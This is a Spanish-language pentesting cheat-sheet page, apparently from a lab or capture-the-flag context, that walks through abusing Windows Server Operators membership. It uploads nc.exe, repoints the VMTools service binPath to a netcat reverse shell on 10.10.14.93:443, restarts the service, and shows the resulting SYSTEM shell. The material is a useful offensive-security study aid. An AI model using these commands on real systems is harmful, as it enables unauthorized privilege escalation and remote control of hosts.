⚪ Server Operators
Información
El grupo/privilegio Server Operators otorga a los usuarios capacidad de crear, detener, iniciar y reiniciar servicios.
(Para abusar de Server Operators, creamos un servicio malicioso con una reverse shell que interpretará al reiniciar el servicio)
Identificar Privilegios
*Evil-WinRM* PS C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
*Evil-WinRM* PS C:\> net user svc-printer
Local Group Memberships *Print Operators *Remote Management Use
*Server Operators
Crear Servicio
*Evil-WinRM* PS C:\> sc.exe create reverse binPath="nc.exe -e cmd 10.10.14.93 443"
Error Permisos
Al crear un nuevo servicio, en ocasiones puede dar problemas por falta permisos.
*Evil-WinRM* PS C:\> sc.exe create reverse binPath="nc.exe -e cmd 10.10.14.93 443"
[SC] OpenSCManager FAILED 5:
Access is denied.
Mostrar Servicios
Listo servicios existentes para intentar modificar uno de ellos
*Evil-WinRM* PS C:\> services
Path Privileges Service
---- ---------- -------
\\10.10.14.93\a\nc.exe -e cmd 10.10.14.93 443 True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
C:\Users\svc-printer\AppData\Local\Temp\nc.exe -e cmd 10.10.14.93 443 True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
Movificar Servicio
Modifico el servicio VMTools para que apunte al nc.exe subido, después detengo e inicio el servicio.
*Evil-WinRM* PS C:\Users\svc-printer\> cd $env:TEMP
*Evil-WinRM* PS C:\Users\svc-printer\AppData\Local\Temp> upload nc.exe
*Evil-WinRM* PS C:\Users\svc-printer\AppData\Local\Temp> sc.exe config VMTools binPath="C:\Users\svc-printer\AppData\Local\Temp\nc.exe -e cmd 10.10.14.93 443"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\AppData\Local\Temp> sc.exe stop VMTools
[SC] ControlService FAILED 1062:
The service has not been started.
*Evil-WinRM* PS C:\Users\svc-printer\AppData\Local\Temp> sc.exe start VMTools
Reverse Shell
Obtengo la shell como usuario nt authority\system
❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.95.241] 54692
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
© d4t4s3c 2025